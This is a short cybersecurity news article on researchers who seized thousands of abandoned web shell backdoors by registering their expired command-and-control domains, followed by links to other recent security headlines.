Over 4K active hacker backdoors found in expiring or abandoned domains

Over 4K active hacker backdoors found in expiring or abandoned domains

Security researchers discovered and hijacked over 4,000 unique web backdoors that had been deployed by various threat actors. The backdoors, which had been abandoned or were reliant on expired infrastructure, were seized and sinkholed by WatchTowr Labs through the purchase and registration of over 40 domain names that these backdoors used for command-and-control (C2) communications. The firm managed to gain control of the compromised systems for as little as $20 per domain.

The backdoors, which are essentially web shells designed to maintain persistent remote access to target networks, varied significantly in scope and functionality. Some of the backdoors were relatively simple, capable of executing attacker-provided commands via PHP-based tools like c99shell and r57shell, while other tools such as China Chopper were more sophisticated. The latter is a web shell associated with Chinese state-backed hacker groups.

Across those 4000 unique and live backdoors, some systems belonged to government entities in Bangladesh, China, and Nigeria, as well as academic institutions across China, South Korea, and Thailand.

The researchers said that several of the web shells had been backdoored by their original maintainers, inadvertently leaking critical information about the locations and entities where they had been deployed. This allowed other threat actors to hijack the backdoors and further use them for their own purposes.


Back to the list

Latest Posts

China-based Smishing Triad targets US and UK consumers with toll payment scams

China-based Smishing Triad targets US and UK consumers with toll payment scams

The campaigns involve fake text messages impersonating legitimate tolling services, such as FasTrak, E-ZPass, and I-Pass.
7 April 2025
Alleged Scattered Spider member pleads guilty

Alleged Scattered Spider member pleads guilty

Additionally, Noah Urban has reportedly agreed to pay $13 million in restitution to 59 victims of his cybercrimes.
7 April 2025
UAC-0226 espionage campaign targets innovation centers and government agencies in Ukraine

UAC-0226 espionage campaign targets innovation centers and government agencies in Ukraine

The initial compromise occurs through phishing emails containing malicious attachments.
7 April 2025